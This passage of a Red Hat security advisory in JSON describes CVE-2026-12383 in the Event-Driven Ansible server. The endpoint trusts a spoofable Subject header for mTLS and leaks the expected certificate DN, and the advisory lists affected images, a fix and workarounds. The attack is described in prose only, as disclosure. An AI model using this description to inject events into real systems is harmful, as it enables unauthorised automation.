"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2489127"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Event-Driven Ansible (EDA) server. The ExternalEventStreamViewSet uses permissive access controls (permission_classes=[AllowAny], authentication_classes=[]) and relies solely on the Subject HTTP header value for mTLS authentication without verifying that the header originated from a trusted proxy. Additionally, the expected certificate Distinguished Name is leaked in the 403 error response body. An attacker who can reach the EDA API endpoint with a spoofed Subject header can inject arbitrary events into mTLS-protected event streams, triggering downstream automation actions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "eda-server: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is a defense-in-depth failure in EDA that becomes exploitable when combined with the gateway header-forwarding issue (tracked as a separate CVE). EDA should not rely solely on an HTTP header for mTLS authentication. The DN leak in the error response further reduces the difficulty of exploitation. EDA has been included in AAP since version 2.4. The mTLS external event stream feature and the trust-of-Subject-header pattern apply to all EDA versions that support external event streams with mTLS authentication.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-12383"
},
{
"category": "external",
"summary": "RHBZ#2489127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489127"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-12383",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-12383"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-12383",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12383"
}
],
"release_date": "2026-07-27T19:04:53.794000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "The following practices would help for avoiding exposure and mitigate this flaw:\n\n- Ensure the EDA server is not directly accessible from untrusted networks; all traffic should route through the AAP Gateway which should perform mTLS validation.\n- If possible, configure network-level access controls to restrict which source IPs can reach the EDA backend API.\n- Monitor EDA event streams for unexpected events_received counter changes.\n- Review and rotate mTLS client certificates if unauthorized access is suspected, as the expected DN may have been leaked via the 403 error response.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
